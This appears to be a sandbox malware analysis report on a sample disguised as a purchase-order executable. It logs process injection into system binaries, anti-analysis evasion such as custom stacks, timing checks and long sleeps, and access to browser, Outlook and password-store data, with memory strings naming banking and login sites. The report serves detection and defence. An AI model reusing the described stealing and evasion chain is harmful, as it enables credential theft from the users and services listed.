            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeFile created: C:\Users\user\AppData\Local\Temp\aut391C.tmpJump to behavior
            Source: Purchase Order TE- 00011-7777.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: RMActivate_ssp.exe, 00000004.00000003.2484559029.0000000000602000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.3886865804.0000000000602000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000003.2484472585.0000000000615000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.3886865804.0000000000636000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Purchase Order TE- 00011-7777.exeReversingLabs: Detection: 28%
            Source: Purchase Order TE- 00011-7777.exeVirustotal: Detection: 29%
            Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe "C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe"
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe"
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeProcess created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe"
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe"Jump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeProcess created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Purchase Order TE- 00011-7777.exeStatic file information: File size 1227264 > 1048576
            Source: Purchase Order TE- 00011-7777.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Purchase Order TE- 00011-7777.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Purchase Order TE- 00011-7777.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Purchase Order TE- 00011-7777.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Purchase Order TE- 00011-7777.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Purchase Order TE- 00011-7777.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Purchase Order TE- 00011-7777.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: CjeBlighAyoJst.exe, 00000003.00000000.2157848345.0000000000F3E000.00000002.00000001.01000000.00000004.sdmp, CjeBlighAyoJst.exe, 00000006.00000000.2318026048.0000000000F3E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: rmactivate_ssp.pdb source: svchost.exe, 00000002.00000003.2212437752.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2212554587.0000000004101000.00000004.00000020.00020000.00000000.sdmp, CjeBlighAyoJst.exe, 00000003.00000002.3887254418.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, CjeBlighAyoJst.exe, 00000003.00000002.3892509880.0000000004E30000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: Purchase Order TE- 00011-7777.exe, 00000000.00000003.2049007327.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, Purchase Order TE- 00011-7777.exe, 00000000.00000003.2048768040.0000000004740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2138944191.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2243668615.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2243668615.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2140864621.0000000003900000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000003.2251311419.000000000094B000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000003.2248798529.000000000079A000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.3888015793.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.3888015793.0000000002E5E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Purchase Order TE- 00011-7777.exe, 00000000.00000003.2049007327.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, Purchase Order TE- 00011-7777.exe, 00000000.00000003.2048768040.0000000004740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2138944191.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2243668615.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2243668615.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2140864621.0000000003900000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, RMActivate_ssp.exe, 00000004.00000003.2251311419.000000000094B000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000003.2248798529.000000000079A000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.3888015793.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.3888015793.0000000002E5E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RMActivate_ssp.exe, 00000004.00000002.3886865804.0000000000582000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.3888738930.00000000032EC000.00000004.10000000.00040000.00000000.sdmp, CjeBlighAyoJst.exe, 00000006.00000000.2318173849.000000000273C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2593235540.000000001F5EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RMActivate_ssp.exe, 00000004.00000002.3886865804.0000000000582000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.3888738930.00000000032EC000.00000004.10000000.00040000.00000000.sdmp, CjeBlighAyoJst.exe, 00000006.00000000.2318173849.000000000273C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2593235540.000000001F5EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: rmactivate_ssp.pdbGCTL source: svchost.exe, 00000002.00000003.2212437752.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2212554587.0000000004101000.00000004.00000020.00020000.00000000.sdmp, CjeBlighAyoJst.exe, 00000003.00000002.3887254418.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, CjeBlighAyoJst.exe, 00000003.00000002.3892509880.0000000004E30000.00000004.00000001.00020000.00000000.sdmp
            Source: Purchase Order TE- 00011-7777.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Purchase Order TE- 00011-7777.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Purchase Order TE- 00011-7777.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Purchase Order TE- 00011-7777.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Purchase Order TE- 00011-7777.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AF20F6 LoadLibraryA,GetProcAddress,0_2_00AF20F6
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AB7795 push ecx; ret 0_2_00AB77A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004019A7 push es; retf 2_2_00401A2B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00406005 push ds; ret 2_2_00406010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408818 push edi; ret 2_2_004088A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401A29 push es; retf 2_2_00401A2B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414CD3 push edi; iretd 2_2_00414CE1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004144AE push ebx; iretd 2_2_004144AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401566 push esi; iretd 2_2_004015F7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401522 push esi; iretd 2_2_004015F7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004145E3 push edx; ret 2_2_00414605
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040159A push esi; iretd 2_2_004015F7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00406FD7 push cs; ret 2_2_00406FD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00407784 push esi; iretd 2_2_0040779A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EF85 pushad ; ret 2_2_0041EF4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AF8E push ebp; retf 2_2_0040AFA2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004037A0 push eax; ret 2_2_004037A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0225F pushad ; ret 2_2_03B027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B027FA pushad ; ret 2_2_03B027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B309AD push ecx; mov dword ptr [esp], ecx2_2_03B309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0283D push eax; iretd 2_2_03B02858
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02CF09AD push ecx; mov dword ptr [esp], ecx4_2_02CF09B6
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_00125075 push edi; ret 4_2_00125101
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_0013152A push edi; iretd 4_2_0013153E
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_001277F4 push ebp; retf 4_2_001277FF
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_0013B7E2 pushad ; ret 4_2_0013B7A8
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_00123834 push cs; ret 4_2_00123835
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_0014482F pushad ; iretd 4_2_00144830
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_00122862 push ds; ret 4_2_0012286D
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_00123FE1 push esi; iretd 4_2_00123FF7
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_009451AE push eax; iretd 4_2_009451B4
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_0094628A push eax; retf 4_2_00946294
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AAF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00AAF78E
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AF7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00AF7F0E
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AB1E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00AB1E5A
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeAPI/Special instruction interceptor: Address: 13BD19C
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E rdtsc 2_2_03B7096E
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeWindow / User API: threadDelayed 9839Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeEvaded block: after key decisiongraph_0-109411
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeAPI coverage: 4.5 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI coverage: 2.8 %
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 1628Thread sleep count: 135 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 1628Thread sleep time: -270000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 1628Thread sleep count: 9839 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 1628Thread sleep time: -19678000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe TID: 7056Thread sleep time: -65000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe TID: 7056Thread sleep time: -37500s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AADD92 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00AADD92
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AE2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00AE2044
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AE219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00AE219F
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AE24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00AE24A9
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AD6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00AD6B3F
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AD6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00AD6E4A
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00ADF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00ADF350
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00ADFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00ADFDD2
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00ADFD47 FindFirstFileW,FindClose,0_2_00ADFD47
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_0013C380 FindFirstFileW,FindNextFileW,FindClose,4_2_0013C380
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AAE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00AAE47B
            Source: 7466H3538.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: 7466H3538.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 7466H3538.4.drBinary or memory string: discord.comVMware20,11696428655f
            Source: 7466H3538.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 7466H3538.4.drBinary or memory string: global block list test formVMware20,11696428655
            Source: 7466H3538.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: RMActivate_ssp.exe, 00000004.00000002.3890715735.000000000755A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655-
            Source: 7466H3538.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 7466H3538.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 7466H3538.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: CjeBlighAyoJst.exe, 00000006.00000002.3887155831.000000000073F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,
            Source: 7466H3538.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 7466H3538.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 7466H3538.4.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 7466H3538.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 7466H3538.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 7466H3538.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: 7466H3538.4.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: firefox.exe, 00000008.00000002.2594465096.000002815F4BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll??
            Source: 7466H3538.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 7466H3538.4.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: 7466H3538.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 7466H3538.4.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: 7466H3538.4.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: 7466H3538.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 7466H3538.4.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 7466H3538.4.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 7466H3538.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 7466H3538.4.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: 7466H3538.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
